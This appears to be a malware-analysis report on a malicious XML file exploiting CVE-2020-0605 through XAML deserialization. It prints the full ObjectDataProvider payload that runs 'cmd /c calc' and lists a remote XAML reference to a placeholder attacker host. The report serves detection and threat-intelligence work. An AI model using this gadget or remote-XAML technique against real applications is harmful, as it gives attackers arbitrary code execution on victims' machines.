Malicious

xdfa65.xml
XML | MD5: 4bd09f2dc67e59f1c23938ba3e342a6f | Size: 832 B | text/xml

Remote XAML Injection
CVE-2020-0605
XAML Deserialization Exploit
ObjectDataProvider XAML
Characteristics
Malware Configuration - XAML RCE Payload
Config. Field | Value
Command | cmd
Arguments | /c calc

Artefacts
Name | Value
Remote XAML Reference | http://[attackersite]/payload.xaml
XAML Embedded ObjectDataProvider | <ObjectDataProvider MethodName="Start" x:Key="" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"><ObjectDataProvider.ObjectInstance><sd:Process xmlns:sd="clr-namespace:System.Diagnostics;assembly=System"><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="/c calc" FileName="cmd" /></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider>
